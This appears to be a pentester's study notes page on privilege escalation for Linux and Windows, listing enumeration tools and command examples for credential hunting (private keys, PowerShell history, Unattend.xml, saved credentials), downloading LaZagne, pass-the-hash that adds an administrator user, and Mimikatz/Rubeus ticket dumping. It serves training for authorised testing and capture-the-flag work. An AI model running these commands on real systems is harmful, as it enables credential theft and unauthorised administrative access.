Red Team - Fourth step - Privilege Escalation


Privilege Escalation πŸ”‘ is the fourth step of the pentester activities. We attempt to escalate from a regular user to an administrative account by exploiting a vulnerability in the system.

This is an important step otherwise we may not have enough privilege to access data, leave a backdoor, or for most post-exploitation tasks.

We want to access account with the higher level of privileges:

  • root > sudoers > [...] on Linux
  • NT AUTHORITY\SYSTEM > Administrator > [...] on Windows

Escalation can be horizontally/laterally (another user with the same level of privileges) and vertically (a higher level of privileges).

Learn πŸŽ“


Privilege Escalation Basics

Each operating system has its own set of escalation vectors while they share similarities. The most common point is that we want to gather information about the environnement.

  • User information πŸ§‘: it may be used to determine your level of access, your role, along with username naming conventions

  • Host information πŸ’»: it may be used to find if there are well-known vulnerabilities or misconfigurations.

  • Network information 🌍: from the outside, we mostly only saw a portion of the internal network. We find find that the host is running a FTP server only available from the inside.

Additionally, look for folders where you can download and run scripts, along with the machine configuration to configure them properly.

I compiled a list of handy commands per operating system:

You will also have to look for installed tools and apps along with their versions. You will need these to look for CVEs and exploits related to local escalation privilege.

Linux privilege escalation πŸ¦†

linprivesc commonlinuxprivesc commonlinuxprivesc linuxprivilegeescalation linux_privilege_escalation

Linux privilege escalation may be achieved by exploiting:

External tools/services

⚠️ Don't forget hidden files. Compiled Recipe.

There are many automated scripts that will investigate usual places, services, files... that you may want to look at. You will still have to understand the output, dig into it...

  • linPEAS (13.9k ⭐ | shell script)
  • LinEnum (6.4k ⭐ | shell script | 2020 πŸͺ¦)
  • traitor (6.3k ⭐ | go script compiled to binary | 2022 ☠️)
  • linux-smart-enumeration a.k.a. LSE (3.0k ⭐ | shell script)
  • linuxprivchecker (1.4k ⭐ | python script, 2021 πŸͺ¦)
  • pwncat-cs (2.3k ⭐ | reverse shell with priv. esc. suggester | 2022 ☠️)

Additional references

Special escalation vectors


  • The SSH banner (/etc/update-motd.d/00-header), which is executed as root, is using a script that we could edit.

Windows privilege escalation πŸͺŸ

windowsprivesc20 windows_privilege_escalation

Windows privilege escalation may be achieved by exploiting:

Additional references

There are many automated scripts that will investigate usual places, services, files... that you may want to look at. You will still have to understand the output, dig into it...

  • WinPeas (13.9k ⭐ | binary | Download and Run .\winPEASany_ofs.exe)
  • wesng (3.8k ⭐ | Work locally from an output file πŸ™Œ)
  • Seatbelt (3.2k ⭐)
  • PrivescCheck (2.4k ⭐ | powershell script)
  • JAWS (1.5k ⭐ | 2020 πŸͺ¦)
  • PowerSploit (11.2k ⭐ | powershell script | 2017 πŸͺ¦ | This is the latest version of PowerTools and PowerUp which are dead too since 2014/2015).
$ --update         # update local database
$ [...] output.txt # process the selected tool output
PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
PS> powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

Credential Hunting

linuxprivesc windowsprivesc20 password_attacks linuxprivilegeescalation

You may try to look for credentials. Try password/key reuse.

  • πŸ”‘ Password, Passphrases
  • 🎫 Tickets (ex: Kerberos), Tokens (ex: GIT), Keys (ex: SSH)

Common places to dig for credentials are:

  • πŸ” command history (ex: ~/.bash_history, *hist*)
  • 🌍 browser history and saved passwords
  • πŸ›£οΈ application and system logs (/var/log/)
  • 🐚 backups (.old, .bak, xxx~...)
  • βœ‰οΈ conversations/mails (/var/mail/)
  • 🌳 configurations (.env, .ini/.config/.cfg/.conf/.cnf, .sql)
  • πŸ€– scripts and tasks (.sh/.ps1/.bat, cronjob)
  • πŸ‘œ check the registry (Windows, privilege required)
  • πŸ’Ž Databases (.*db*), Password Managers, Applications, Files
  • ...

Manually dig for interesting or unexpected files

  • /: look for unexpected folders in /
  • /root/: test if administrator home is readable
  • ~/Desktop: look for documents, passwords...
  • ~/Documents: look for documents, passwords...
  • %appdata%: look for sensitive applications data

Always put yourself in the target shoes.

Linux CredHunting Notes

linuxprivesc password_attacks linuxprivilegeescalation ignite chillhack validation

You often find interesting files in easy CTFs using:

$ find / -user $(whoami) -type f 2>/dev/null | grep -v /proc | grep -v /sys
$ find / -type f -writable 2>/dev/null | grep -v /proc | grep -v /sys

Find credentials, keys, tokens, passwords:

$ find / -name .ssh 2> /dev/null
$ find / -name *id_rsa* 2> /dev/null
$ grep -rnw "PRIVATE KEY" / 2>/dev/null | grep ":1" # private keys
$ grep -rnw "ssh-rsa" / 2>/dev/null | grep ":1"     # public keys
$ find / -wholename "*.git/config" 2> /dev/null | xargs grep "url"

πŸ” As root, check Linux password history file: /etc/security/opasswd.

Windows CredHunting Notes

windowsprivesc20 password_attacks

Read PowerShell console history:

PS> type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
CMD> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

List saved credentials by Windows:

PS> cmdkey /list
PS> # use 'admin' saved credentials to start cmd.exe
PS> runas /savecred /user:admin cmd.exe

Some known locations:

# Internet Information Services (IIS) = the default web server
PS> type C:\inetpub\wwwroot\web.config | findstr connectionString
PS> type C:\Windows\Microsoft.NET\Framework64\vX.X.XXXXX\Config\web.config | findstr connectionString
# Windows Deployment Services (credentials of the admin that
# deployed the OS image to several hosts, referred as "Unattended")
PS> type C:\Unattend.xml
PS> type C:\Windows\Panther\Unattend.xml
PS> type C:\Windows\Panther\Unattend\Unattend.xml
PS> type C:\Windows\system32\sysprep.inf
PS> type C:\Windows\system32\sysprep\sysprep.xml
# Putty
PS> reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
# VNC servers
# FileZilla
PS> type C:\xampp\FileZilla Server\FileZilla Server.xml
PS> type C:\Program Files\FileZilla Server\FileZilla Server.xml

Automated Tools To Find Credentials


You can use LaZagne (8.9k ⭐).

PS> wget IP:port/LaZagne.exe -UseBasicParsing -O LaZagne.exe
PS> .\LaZagne.exe all


Pass-the-hash (pth)

password_attacks attacking_common_services

There are some scenarios in which we got hold of a hash, but haven't managed to crack it. We may try to use the hash.

Legacy systems using NTLM instead of Kerberos (or alternatives) may be vulnerable as hashes are not salted and may be reused.

  • Protocol-specific tools (examples)
$ evil-winrm -i IP -u username -H "hash" # WinRM protocol
$ impacket-psexec -hashes :hash username@IP
$ nxc smb IP/32 -u username -d . -H hash
$ xfreerdp  /v:IP /u:username /pth:hash

⚠️ Remote Local Administrator pth is not possible by default. You need to disable DisableRestrictedAdmin, for instance, using: reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f (registry permission required).

  • We can use the popular Mimikatz tool on Windows.

  • We can use linikatz (0.5k ⭐) on a Linux target

  • We can use the Invoke-TheHash (1.4k ⭐, 2018 πŸͺ¦) script suite on Windows. We can use it to create a user on the target, if we have admin access onto the target. Otherwise, pop a reverse shell.

PS> Import-Module .\Invoke-TheHash.psd1
PS> Invoke-SMBExec -Target IP -Domain xxx -Username xxx -Hash xxx -Command "net user xxx Password123 /add && net localgroup administrators xxx /add" -Verbose
PS> Invoke-WMIExec -Target DC01 -Domain -Username xxx -Hash xxx -Command "cmd.exe"

⚠️ We cannot remotely access a local administrator account by default. If FilterAdministratorToken is disabled, you can set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1 to by-pass this check.

Pass-the-ticket (ptt)


Some authentication mechanisms such as Kerberos are based on tickets to authorize access to resources. Given a ticket that hasn't expired, we may be able to access interesting resources.

On Windows, an user can only access their tickets, while an admin can access every ticket on the computer.

  • We can use the popular Mimikatz tool on Windows.
mimikatz# sekurlsa::tickets /export # dump tickets
CMD> dir *.kirbi # @krbtgt == TGT
mimikatz# kerberos::ptt ".\xxx@yyy.kirbi" # load ticket
  • We can use linikatz (0.5k ⭐) on Linux

  • We can use mimipenguin (3.6k ⭐, 2022 πŸͺ¦) on Linux

  • We can use Rubeus (3.7k ⭐) on Windows

PS> .\Rubeus.exe dump /nowrap # Dump tickets
PS> # Load the ticket in the current session
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /ptt
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>
PS> # Pass the Key / OverPass the Hash == create a ticket
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /aes256:xxx /nowrap
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /nowrap

What's next? 🐼 According to the ticket that was loaded, you may be able to run commands that you couldn't before. For instance:

PS> dir \\\c$
PS> dir \\\some_user_share
PS> dir \\DC01\some_user_share
PS> Enter-PSSession -ComputerName DC01

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.



  • WADComs (1k ⭐)/wadcoms website
  • Metasploit PRO
  • Create custom modules, -m or loadpath to load them, doc
  • Test cracked credentials on any user

Exploiting Services